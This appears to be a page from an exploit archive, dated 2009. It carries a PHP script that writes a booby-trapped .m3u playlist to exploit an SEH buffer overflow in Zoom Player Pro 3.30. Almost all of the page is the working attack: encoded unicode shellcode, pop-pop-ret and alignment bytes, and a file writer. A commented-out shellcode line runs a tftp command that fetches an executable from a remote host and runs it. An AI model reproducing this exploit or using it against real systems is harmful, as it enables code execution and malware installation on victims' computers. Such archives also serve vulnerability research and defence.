[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zoom Player Pro v.3.30 .m3u File Buffer Overflow Exploit (seh)
# Published : 2009-04-27
# Author : Nine:Situations:Group
# Previous Title : SDP Downloader 2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH) #2
# Next Title : CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow Exploit
<?php
/*
Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)
by Nine:Situations:Group::surfista
seems the same of http://secunia.com/advisories/28214/
bug found by Luigi Auriemma
no full working exploit out, so I made my test version
/*
/*
//original shellcode, 27 bytes + command
//re-encode with
//alpha2 --unicode ecx <sh.txt
$scode =
"xebx13x5bx31xc0x50x31xc0x88x43x4ax53".
"xbbx0dx25x86x7c". //WinExec, kernel32.dll XP SP3
"xffxd3x31xc0xe8xe8xffxffxff".
"cmd /c tftp -i 192.168.0.1 GET s s.exe && s && ".
"xff";
*/
$_scode="IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1".
"AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhkMC1Kn".
"QWPnpNQGP3XPCPJaCEkJmo5TFsLYoHSNQUpiXgxyoKOKOosPmOtKpNOQSKp1d36rTp".
"pkpNMpimPNQp9nRlnnQP6lxNNlplnP1MPPGQ524O0RSO02SnN35rXPeKpLfKvKp43kpkvmVMPkOA";
$buff="x23x45x58x54x4dx33x55x0dx0ax68x74x74x70x3ax2fx2f".
"x77x77x77".
str_repeat("x61",0xfe8).
/* unicode preamble, alignment */
"x6e". //add byte ptr [esi],ch, nop equivalent [*]
"xd3x45". //0x004500d3 unicode friendly pop - pop - ret, zplayer.exe
"x6e". //*
"x05x7fx4c". //add eax,4c007f00h
"x6e". //*
"x2dx59x4c". //sub eax,4c005900h
"x6e". //*
"x50". //push eax
"x6e". //*
"x59". //pop ecx
str_repeat("x6ex90",0x7f). //nop
"x6e". //*
"x6a". //push 0, nop equivalent
$_scode.
str_repeat("x90",0xbb8);
$_fp=@fopen("pwn.m3u","w+");
if (!$_fp) { die("[:(] Failed to create file...");}
fputs($_fp,$buff);
fclose($_fp);
print("[:)] Done!");
?>
# www.Syue.com [2009-04-27]